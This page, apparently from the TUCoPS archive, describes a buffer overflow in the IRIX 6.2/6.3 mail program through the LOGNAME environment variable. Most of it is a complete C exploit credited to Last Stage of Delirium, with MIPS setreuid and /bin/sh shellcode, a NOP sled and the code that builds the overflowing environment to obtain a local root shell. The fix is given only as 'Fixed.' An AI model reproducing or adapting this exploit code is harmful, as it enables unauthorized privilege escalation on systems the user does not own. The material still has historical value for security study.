TUCoPS :: SGI :: mail9~1.txt

Irix mail root exploit

COMMAND

    mail

SYSTEMS AFFECTED

    IRIX 6.2, 6.3

PROBLEM

    There exists a buffer  overflow vulnerability in the  mail program
    in the  way the  LOGNAME environment  variable is  handled.  It is
    possible  to  exploit  this  bug   and  locally  gain  root   user
    privileges.

    /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland        *://lsd-pl.net/ #*/
    /*## /usr/bin/mail                                                           #*/

    #define ADRNUM 228
    #define PCHNUM 440
    #define TMPNUM 228
    #define NOPNUM 5000
    #define ALLIGN 3

    char setreuidcode[]=
        "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff     */
        "\x24\x02\x04\x01"    /* li      $v0,1024+1           */
        "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1           */
        "\x03\xff\xff\xcc"    /* syscall                      */
        "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff       */
        "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff       */
        "\x24\x02\x04\x64"    /* li      $v0,1124             */
        "\x03\xff\xff\xcc"    /* syscall                      */
    ;

    char shellcode[]=
        "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
        "\x24\x02\x03\xf3"    /* li      $v0,1011             */
        "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
        "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
        "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
        "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
        "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
        "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
        "\x03\xff\xff\xcc"    /* syscall                      */
        "/bin/sh"
    ;

    char jump[]=
        "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
        "\x03\xe0\x00\x08"    /* jr      $ra                  */
    ;

    char nop[]="\x24\x0f\x12\x34";

    main(int argc,char **argv){
        char buffer[10000],adr[4],pch[4],tmp[4],*b,*envp[3];
        int i;

        printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland  //lsd-pl.net/\n");
        printf("/usr/bin/mail for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");

        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10264+2500+228+228;
        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10264+112+32356;
        *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+10264+7000;

        envp[0]=buffer;
        envp[1]=&buffer[8000];
        envp[2]=0;

        b=buffer;
        sprintf(b,"xxx=");
        b+=4;
        for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
        for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
        for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
        for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
        for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
        *b=0;

        b=&buffer[8000];
        sprintf(b,"LOGNAME=");
        b+=8;
        for(i=0;i<ALLIGN;i++) *b++=0xff;
        for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
        *b=0;

        execle("/usr/bin/mail","lsd",0,envp);
    }

SOLUTION

    Fixed.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH